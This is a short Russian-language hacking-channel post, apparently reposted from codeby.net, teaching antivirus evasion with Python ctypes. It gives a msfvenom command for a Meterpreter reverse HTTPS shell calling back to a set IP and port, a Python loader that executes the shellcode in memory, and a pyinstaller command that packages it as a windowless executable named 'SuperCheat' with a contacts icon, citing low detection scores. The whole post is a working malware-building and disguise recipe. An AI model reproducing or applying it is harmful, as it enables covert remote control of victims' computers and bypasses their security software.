Обход антивируса с помощью ctypes(python)

Обход антивируса с помощью ctypes(python)

@webware

t.me/webware

Привет колеги.

Сегодня покажу очень простенький пример обхода антивируса с помощью библиотеки ctypes в языке программирования python.

Суть обхода в том эта библиотека дает нам возможность выполнять код C|C++ в питоновском скрипте.

И мы смело сможем запустить шеллкод метасплоита в оперативной памяти.


Вы уж простите много писать пока не буду,времени очень мало у меня,отпишу потом пояснения в коментариях если возникнут вопросы у кого то .))


Вообщем ближе к делу


И так проделываем следующие шаги:

1)Создаем шеллкод командой:

msfvenom -p windows/meterpreter/reverse_https lport=1337 lhost=192.168.137.137 -b \0x0a\0x0b\0xff -f c

тут ничего пояснять думаю не нужно ,лишь обратить внимания стоит на параметр -b которым мы указываем которые плохие символы в шеллкоде нужно не использовать.


Дальше создаем скрипт на питоне следуещого вида:

from ctypes import *

shellcode = ("Тут_копипастим_наш шеллкод_созданный_через_msf_venom");

tralivali = create_string_buffer(shellcode, len(shellcode))
shell = cast(tralivali, CFUNCTYPE(c_void_p))

shell()

Собираем через pyinstaller на Windows системе..

C:\Python27\Scripts\pyinstaller.exe -F --noconsole --onefile --icon=C:\Users\CorpOfHack\Desktop\contacts.ico C:\Users\CorpOfHack\Desktop\SuperCheat.py

Хочу заметить что когда я не использовал картинку мне показало на https://nodistribute.com/ 0/35

а когда добавил иконку то 8/35. Почему пока не выяснял.

Вот без картинки

А вот с картинкой


Ну в любом случае результат не плохой) Все спасибо за внимания.Надеюсь был полезен)

Источник codeby.net

Report Page